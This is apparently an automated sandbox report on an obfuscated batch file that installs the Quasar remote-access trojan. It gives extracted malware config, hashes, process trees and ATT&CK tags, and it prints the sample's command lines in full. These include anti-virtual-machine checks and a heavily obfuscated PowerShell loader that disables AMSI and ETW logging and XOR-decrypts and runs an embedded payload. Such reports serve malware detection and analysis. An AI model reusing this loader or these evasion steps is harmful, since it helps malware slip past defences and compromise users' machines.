quasar | fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db

Analysis

max time kernel
50s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
01-12-2024 23:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-built.exe_obf.bat
Size

4.8MB
MD5

0ea9a510475daf6eb6499a876dade6c2
SHA1

6b2414fc97ff2aa43a561d3110ec3e5017ca87ec
SHA256

fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db
SHA512

b94b96765df14ee5ca7617f98b2e5750ad361193f435c7d9e0a6c9f7a775cfd70c7960c522a055d69125652ce070c2281e29ccd120b00d5748c5aa4587ea494a
SSDEEP

49152:6xA1np9ExTwHISa8/DNhtJJMJYz4xkFjyfgxLHRvs24CJMBDU78RH:k

Score

10^/10

quasar fr execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

127.0.0.1:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes

encryption_key
A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4156-92-0x000002CAC0740000-0x000002CAC0A64000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
4780	powershell.exe
1956	powershell.exe
4156	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
4960	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4196	powershell.exe
4196	powershell.exe
4780	powershell.exe
4780	powershell.exe
1956	powershell.exe
1956	powershell.exe
4156	powershell.exe
4156	powershell.exe
4156	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeIncreaseQuotaPrivilege	3492	WMIC.exe
Token: SeSecurityPrivilege	3492	WMIC.exe
Token: SeTakeOwnershipPrivilege	3492	WMIC.exe
Token: SeLoadDriverPrivilege	3492	WMIC.exe
Token: SeSystemProfilePrivilege	3492	WMIC.exe
Token: SeSystemtimePrivilege	3492	WMIC.exe
Token: SeProfSingleProcessPrivilege	3492	WMIC.exe
Token: SeIncBasePriorityPrivilege	3492	WMIC.exe
Token: SeCreatePagefilePrivilege	3492	WMIC.exe
Token: SeBackupPrivilege	3492	WMIC.exe
Token: SeRestorePrivilege	3492	WMIC.exe
Token: SeShutdownPrivilege	3492	WMIC.exe
Token: SeDebugPrivilege	3492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3492	WMIC.exe
Token: SeRemoteShutdownPrivilege	3492	WMIC.exe
Token: SeUndockPrivilege	3492	WMIC.exe
Token: SeManageVolumePrivilege	3492	WMIC.exe
Token: 33	3492	WMIC.exe
Token: 34	3492	WMIC.exe
Token: 35	3492	WMIC.exe
Token: 36	3492	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3492	WMIC.exe
Token: SeSecurityPrivilege	3492	WMIC.exe
Token: SeTakeOwnershipPrivilege	3492	WMIC.exe
Token: SeLoadDriverPrivilege	3492	WMIC.exe
Token: SeSystemProfilePrivilege	3492	WMIC.exe
Token: SeSystemtimePrivilege	3492	WMIC.exe
Token: SeProfSingleProcessPrivilege	3492	WMIC.exe
Token: SeIncBasePriorityPrivilege	3492	WMIC.exe
Token: SeCreatePagefilePrivilege	3492	WMIC.exe
Token: SeBackupPrivilege	3492	WMIC.exe
Token: SeRestorePrivilege	3492	WMIC.exe
Token: SeShutdownPrivilege	3492	WMIC.exe
Token: SeDebugPrivilege	3492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3492	WMIC.exe
Token: SeRemoteShutdownPrivilege	3492	WMIC.exe
Token: SeUndockPrivilege	3492	WMIC.exe
Token: SeManageVolumePrivilege	3492	WMIC.exe
Token: 33	3492	WMIC.exe
Token: 34	3492	WMIC.exe
Token: 35	3492	WMIC.exe
Token: 36	3492	WMIC.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeIncreaseQuotaPrivilege	4576	WMIC.exe
Token: SeSecurityPrivilege	4576	WMIC.exe
Token: SeTakeOwnershipPrivilege	4576	WMIC.exe
Token: SeLoadDriverPrivilege	4576	WMIC.exe
Token: SeSystemProfilePrivilege	4576	WMIC.exe
Token: SeSystemtimePrivilege	4576	WMIC.exe
Token: SeProfSingleProcessPrivilege	4576	WMIC.exe
Token: SeIncBasePriorityPrivilege	4576	WMIC.exe
Token: SeCreatePagefilePrivilege	4576	WMIC.exe
Token: SeBackupPrivilege	4576	WMIC.exe
Token: SeRestorePrivilege	4576	WMIC.exe
Token: SeShutdownPrivilege	4576	WMIC.exe
Token: SeDebugPrivilege	4576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4576	WMIC.exe
Token: SeRemoteShutdownPrivilege	4576	WMIC.exe
Token: SeUndockPrivilege	4576	WMIC.exe
Token: SeManageVolumePrivilege	4576	WMIC.exe
Token: 33	4576	WMIC.exe
Token: 34	4576	WMIC.exe
Token: 35	4576	WMIC.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.exenet.exepowershell.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 400 wrote to memory of 4196	400	cmd.exe	78
PID 400 wrote to memory of 4196	400	cmd.exe	78
PID 4196 wrote to memory of 3492	4196	powershell.exe	79
PID 4196 wrote to memory of 3492	4196	powershell.exe	79
PID 400 wrote to memory of 4780	400	cmd.exe	81
PID 400 wrote to memory of 4780	400	cmd.exe	81
PID 400 wrote to memory of 1296	400	cmd.exe	82
PID 400 wrote to memory of 1296	400	cmd.exe	82
PID 1296 wrote to memory of 4576	1296	cmd.exe	83
PID 1296 wrote to memory of 4576	1296	cmd.exe	83
PID 400 wrote to memory of 2476	400	cmd.exe	84
PID 400 wrote to memory of 2476	400	cmd.exe	84
PID 2476 wrote to memory of 1260	2476	cmd.exe	85
PID 2476 wrote to memory of 1260	2476	cmd.exe	85
PID 400 wrote to memory of 1956	400	cmd.exe	86
PID 400 wrote to memory of 1956	400	cmd.exe	86
PID 400 wrote to memory of 3380	400	cmd.exe	87
PID 400 wrote to memory of 3380	400	cmd.exe	87
PID 3380 wrote to memory of 2240	3380	cmd.exe	88
PID 3380 wrote to memory of 2240	3380	cmd.exe	88
PID 400 wrote to memory of 1796	400	cmd.exe	89
PID 400 wrote to memory of 1796	400	cmd.exe	89
PID 400 wrote to memory of 4960	400	cmd.exe	90
PID 400 wrote to memory of 4960	400	cmd.exe	90
PID 400 wrote to memory of 1352	400	cmd.exe	91
PID 400 wrote to memory of 1352	400	cmd.exe	91
PID 400 wrote to memory of 2692	400	cmd.exe	92
PID 400 wrote to memory of 2692	400	cmd.exe	92
PID 2692 wrote to memory of 2344	2692	net.exe	93
PID 2692 wrote to memory of 2344	2692	net.exe	93
PID 400 wrote to memory of 4156	400	cmd.exe	94
PID 400 wrote to memory of 4156	400	cmd.exe	94
PID 4156 wrote to memory of 1612	4156	powershell.exe	95
PID 4156 wrote to memory of 1612	4156	powershell.exe	95
PID 1612 wrote to memory of 2008	1612	csc.exe	96
PID 1612 wrote to memory of 2008	1612	csc.exe	96
PID 4156 wrote to memory of 4852	4156	powershell.exe	97
PID 4156 wrote to memory of 4852	4156	powershell.exe	97
PID 4852 wrote to memory of 4916	4852	csc.exe	98
PID 4852 wrote to memory of 4916	4852	csc.exe	98
PID 4156 wrote to memory of 2884	4156	powershell.exe	99
PID 4156 wrote to memory of 2884	4156	powershell.exe	99
PID 2884 wrote to memory of 1636	2884	csc.exe	100
PID 2884 wrote to memory of 1636	2884	csc.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4196
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:1260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:2240
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1796
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:4960
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:1352
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe_obf.bat';$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, 0x61, 116, 105, 111, 0x6e, 0x2e, 0x41, 109, 0x73, 0x69, 85, 116, 105, 0x6c, 115)));$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73, 0x69, 0x49, 0x6e, 0x69, 0x74, 0x46, 0x61, 0x69, 0x6c, 0x65, 0x64)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));[ReFLeCtION.asSEmBlY]::LoAdWitHpArTIAlName(([SYsTEm.TEXT.eNcoDINg]::UTf8.geTstRINg((83, 121, 115, 116, 101, 109, 46, 67, 111, 114, 101)))).GetTYPE(([systEm.TeXT.EnCoDINg]::UtF8.GEtstRINg((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 69, 118)) + [SySTEm.tEXT.encodiNG]::UTF8.GETsTrIng((101, 110, 0x74, 0x69, 110, 0x67, 46, 69, 0x76, 101, 0x6e, 0x74, 0x50, 0x72, 111, 0x76, 105, 0x64, 0x65, 114)))).getfIeLd(([SYsTEm.text.eNCOdiNG]::uTF8.getstrINg((0x6d, 0x5f, 0x65, 0x6e)) + [sySTeM.Text.EncODiNg]::UtF8.GEtSTrInG((97, 98, 108)) + [syStem.TeXt.EncOdIng]::uTF8.GeTsTRing((0x65, 0x64))),([sySTem.Text.eNcodINg]::UtF8.GeTstRing([SYstEM.CoNveRT]::FROmBasE64STriNG('Tm9uUHVibGljLEluc3RhbmNl')))).seTValUE([REF].asseMBLy.GetTyPe(([sYStem.text.encOdINg]::UTf8.geTSTRiNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99)) + [SySTeM.texT.eNCoDING]::utF8.GeTStRINg((0x69, 110, 0x67, 46, 0x50, 83, 69, 0x74, 119, 76, 111, 103, 80, 0x72, 0x6f, 118, 0x69, 0x64, 0x65, 0x72)))).GEtfIeLD(([SYStEM.tExT.EncOdING]::uTf8.geTStRiNg((101, 0x74, 0x77, 80, 0x72, 111, 0x76, 105, 0x64, 0x65, 0x72))),([SystEm.teXT.EncOdinG]::Utf8.geTsTrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))).getVAluE($null),0);${k`DOttBa`IdXwfe`P}=[CONVert]::fRombaSe64StrING((.([char]((-10822 - 444 + 4792 + 6545))+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078))+[char]((13362 - 9970 + 1391 - 4738))+[char]((5188 - 4472 - 5840 + 5191))+[char]((-90 - 4243 - 5330 + 9774))+[char]((3240 - 773 + 150 - 2507))+[char]((2248 - 3603 - 6172 + 7643))+[char](((-1592 -Band 2269) + (-1592 -Bor 2269) + 1951 - 2527))+[char]((6728 - 396 - 8648 + 2426))+[char]((14221 - 2019 - 9923 - 2163))) $kDot_fIle -raw | .([char](((-10102 -Band 9771) + (-10102 -Bor 9771) + 8307 - 7893))+[char]((-5232 - 5714 + 5289 + 5758))+[char](((-21704 -Band 4830) + (-21704 -Bor 4830) + 7332 + 9650))+[char](((-5361 -Band 200) + (-5361 -Bor 200) - 1929 + 7191))+[char]((5796 - 1685 - 2855 - 1157))+[char]((6886 - 3432 - 3062 - 276))+[char]((-8782 - 6695 + 9561 + 5961))+[char]((10338 - 5304 - 9362 + 4411))+[char](((2817 -Band 574) + (2817 -Bor 574) + 6664 - 9939))+[char]((-935 - 4669 + 4701 + 1017))+[char]((14905 - 2821 - 7680 - 4299))+[char](((-20980 -Band 8328) + (-20980 -Bor 8328) + 9978 + 2784))+[char]((1948 - 3900 - 5056 + 7111))) (([sysTEM.TEXt.ENcODING]::uTF8.GeTsTrINg([sySTeM.CONveRT]::fRoMbaSe64STrING('Og=='))) + ([sySTEM.Text.EncODInG]::UtF8.getsTRing([SYSTem.CoNVerT]::fRombAse64sTRINg('OktET1Q6OiguKik='))))).MAtchEs.grOUps[1].VAlUE);${KDotDGukzlrZeN}=[sYstEM.tEXt.EnCoDiNg]::Utf8.geTBYtEs(([sYsteM.tEXT.EncOdIng]::UTf8.GeTSTRInG((109, 81, 98, 117, 108, 70, 114, 49, 114, 98, 52, 120, 86, 117, 52, 49))));${kdotcabiZvWzUe}=.([char](((489 -Band 330) + (489 -Bor 330) + 1171 - 1912))+[char](((5256 -Band 2125) + (5256 -Bor 2125) - 4663 - 2617))+[char]((436 - 1047 + 5610 - 4880))+[char](((6007 -Band 1143) + (6007 -Bor 1143) - 3369 - 3736))+[char](((6570 -Band 5861) + (6570 -Bor 5861) - 8832 - 3520))+[char](((-5856 -Band 5287) + (-5856 -Bor 5287) - 5737 + 6404))+[char]((190 - 4849 - 2788 + 7553))+[char]((15595 - 5946 - 3629 - 5919))+[char]((-4101 - 7031 + 6016 + 5215))+[char](((-7556 -Band 3381) + (-7556 -Bor 3381) + 9926 - 5635))) byte[] ${`Kd`Ottb`AIdX`WfeP}.lenGtH;for (${kdOtdGvp`BeC`Mnr}=0; ${kdOt`DGV`Pbe`Cmnr} -lt ${`KDottbAi`DXWfe`P}.lengTH; ${K`DotdG`VpbeCmnr}++) {${kDot`Ca`B`IZvWzue}[${`K`Dot`D`G`VPBeCmnr}]=${kdOttbaidxwfeP}[${kd`OtD`Gvpbe`Cmnr}] -bxor ${kdotDguKzLrZen}[${kd`OtdG`VpbeC`Mnr} % ${Kdotd`GuKzLr`Zen}.leNGTh]};.([char]((22989 - 8254 - 7750 - 6880))+[char](((-3745 -Band 1431) + (-3745 -Bor 1431) - 4880 + 7295))+[char]((14060 - 4791 - 239 - 8910))) ([sySTeM.TEXt.encodIng]::uTf8.geTSTRing(${kdotcabIzvWZue}))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4156
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ow2uio3t\ow2uio3t.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFA4.tmp" "c:\Users\Admin\AppData\Local\Temp\ow2uio3t\CSC33DA41ADFB4944528140EF33E8803D19.TMP"
      4⤵
      PID:2008
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pron50eq\pron50eq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp" "c:\Users\Admin\AppData\Local\Temp\pron50eq\CSC2146213ACEEB4960855C8754D928E697.TMP"
      4⤵
      PID:4916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l2v525ua\l2v525ua.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD532.tmp" "c:\Users\Admin\AppData\Local\Temp\l2v525ua\CSCEA86EF5A6C614F0DADC488C5E527129B.TMP"
      4⤵
      PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCFA4.tmp

Filesize
1KB

MD5
6e903e284588d2e2839731d0dd95699e

SHA1
33bbd05ac4ce9c34d48d246e482764b9096c2e66

SHA256
bd5bd00eef9795d1a6650d3bed2fcf4648213615f6f32db68c527ca4a1e3df0f

SHA512
7f7f4f60ea0746c34ae928b63288d7f07fc1b7e6a60ad5304c491448d84ef8f9ee3145b237400db5213c8c54f47ba9b91e4c6a8ca40a5d666714b53044256586

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp

Filesize
1KB

MD5
24ed51054239d362ae5c27cdd67afc15

SHA1
07bfcb536a7c947d27bc2c137cc13df788abbe4c

SHA256
6a2c893934ba41d0ff34d152dde72bd1d813d1c94279771938c748be0e5be426

SHA512
a437e8df59d6c339d990478ebe36b1c66e3c273c7357b751e945d2cc796bb080354e94d2ae87771c8e7e83d41f2c77da65622a6a33b95f5e457cdc21c628c324

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD532.tmp

Filesize
1KB

MD5
8ad1dc98e3d373eaf57a0de6244580dc

SHA1
e1d67dfe821e58f20303d059b609c5c790ab08d1

SHA256
b929bcf87e3bb8f81d2dfed9e4a16325728b8c18d4b4ed852910f1a501e563ba

SHA512
1dde905b874dabd2b6b651da237e57bb70e6c58bed60be6d4a2e8ebdbbf1944813752565987aed46db51fbaf0f6a2e6906f76d848b6cefc776c30fd958294614

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1a4ka1uy.a1y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\l2v525ua\l2v525ua.dll

Filesize
4KB

MD5
74ab61c2f1f6c256397a83ab4d7c0b4b

SHA1
8601ab07d18d24fc68d134efc3cdb0ba60f3f9e0

SHA256
2ed8208a772c5ba9371039b9d53a419654405a44d3a9b4681685d113f36675c1

SHA512
8d2d5b3ba0c21e3f4b82027ce7ba5889b93cbb5fa8c347170b62d0f1f04a485f50d98e659d4a9a0c765c8a797e3ec4cdffecd82e17bc16639d852ca573c1b93a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ow2uio3t\ow2uio3t.dll

Filesize
3KB

MD5
ef577a4d199ead3f52320cf4c3ab02e2

SHA1
2cb91b468aceabb706321d71323356dd31b55359

SHA256
80cc98501b7a6bcd2687ba047eae38b778a4659c1d65e2bc6b6d8cf65a2d47af

SHA512
b8f0f3f11ebb4869655580ec47490fc788f6c8894b311163afc260bbcfb5ed598b566a49d26566af9a34f4e154cb074ad23f9a6875d77f1e58cc43769eca2eac

Download Submit
C:\Users\Admin\AppData\Local\Temp\pron50eq\pron50eq.dll

Filesize
7KB

MD5
6d4689f2dbcf74da01f246c3dc66a4fe

SHA1
e2cc51144869305aa44d7408a7cb19efbca6cc7d

SHA256
1e137fb58f405e577ac17675e3426b990e78435ea7ef1e7cd809e1aaa800da0e

SHA512
9dcc06ef5fb874b1097e264089f6c780f32920f32c1f62dd5ee9d5b169e32a06817b381448baf60e1030ed13acf91291f7e763c1f05b2b4ba27cb460306fd361

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2v525ua\CSCEA86EF5A6C614F0DADC488C5E527129B.TMP

Filesize
652B

MD5
d621a3b8f5b56e0bd9300cc913eb3eea

SHA1
1396362005c64a497e246724f55671976e8df894

SHA256
39404ff70bab29b34ef4a30e1e5983a5d510eab869657e7540ea94998b14714f

SHA512
75a8fd59f6ad1beceb28c75d093d2b91d9534a2e02244306cd29088411d8fa8984c00af4824813dd08950ea46a8eeec4fdd20af9a573658fa20d9e67d0d26fa2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2v525ua\l2v525ua.0.cs

Filesize
1KB

MD5
6e8030c75c39f3dab7309a0eaac2ba0a

SHA1
270afbaadbca8c757511a0730a20a19f4f76a6b9

SHA256
538802dd9cf317ab687c4d40d6e1f9ca4b62f3debb6d58b67b88a17f02f2c3cb

SHA512
19eb6d58e2656dc0ee3d1c096590a4c554cff1bd8c44ddbfba9de10340dd066a3300f0b59bb5431f461ddac9d88a6f10573f9059d02f502bbbcc2104a2a36720

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2v525ua\l2v525ua.cmdline

Filesize
369B

MD5
e7807632e5ce61c5d4c5348ce59c4937

SHA1
113d6cc60201e365e4fd38dd5d7bb93ee599fd27

SHA256
498eb84f7ca1be067970490a164bbc4e254167adac0381c5bbc050eaf4579d16

SHA512
5568e3d32e7a834e5adfb26e3439dc807cf3e105f79e3fbba1143859a0c19c643c7425153ff9025f856676a8b6a6e81632ff55ec3386451ac2c94823dbfdc611

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ow2uio3t\CSC33DA41ADFB4944528140EF33E8803D19.TMP

Filesize
652B

MD5
894991b2eb0b5ec8d96e55af442cbfc7

SHA1
d219f746ab259579d255bc2c858257ffb3ba629c

SHA256
a03767396474e0a7857508f3463b82cd366d8ebb77a41209523cec5bce7d9103

SHA512
1ef793c3bebbb059defbab48bd19f1af63e427c8a5cfeba5220c41c00ebfeff14b36ef577255e04e25dead9188afb31528b27d3b04e57cf21b917905768ad029

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ow2uio3t\ow2uio3t.0.cs

Filesize
296B

MD5
59e00d9a8925d2e96361aa508ec6f847

SHA1
787a9ed5d1e3b60b051580b95f48ddaddbb12df5

SHA256
3e745a1684973fcd0d62fb9f937cb7748df158ff608c8a5c3da39a8b1f30b540

SHA512
5d9e2cf08f0f56a9c1ce0d966e88fbb27b9fee06da16c38b723c5a5786fb35b725bb015cbaedb860e3fb68b7760b4afe072396803244466adc0707dcc991078f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ow2uio3t\ow2uio3t.cmdline

Filesize
369B

MD5
ac24b1e3853fe7e4605a70e0a2e810e2

SHA1
dc85626e5adda5f862c19fb86706faf2cf083659

SHA256
00a551b38d02679a487c77c613de93105adb71374e9ee51d8cd75b0679bb5388

SHA512
d1dd18e71f27dd4b67e8092d195e3b306184a843f5a844339dfbdf336392d97e68fd8deb2a99000b039538882358138a28b23620a35813119378d6412d636988

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pron50eq\CSC2146213ACEEB4960855C8754D928E697.TMP

Filesize
652B

MD5
1e37670669ea608f7ad259a9a66f66d3

SHA1
4f1d7df8c976af176ab5be34a6077d76d18017f0

SHA256
8593826b1d350b4ebde304645f6064d19250fbb02dd86b738e6ba9b13eb0b5ff

SHA512
1e9eef379e49610eb80d30668d88cc68a99b892b832560e44f6cda5e5b1aa76f1226a44c57a20d4d547627c00f7730049e6fa102c7e70fcabc1902ee114066fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pron50eq\pron50eq.0.cs

Filesize
9KB

MD5
5fe5dff46b565d67601ae7d3420c5898

SHA1
bfbc553fcc84f1bc667f49f27207b26e2b47b3b4

SHA256
4e6e2f7132e6d41f4d8d8639eb9beb4e89fd683632f2e12f74f35fa82d682305

SHA512
f9b0ecad474ec77d88e1f27196e3e0a6f65d38999b50f5c6ba34fc41dcddcffb46ca93fcf9e32aa556352c091fabd0b2722819980b8ab22df2349ee9a8f9c7f4

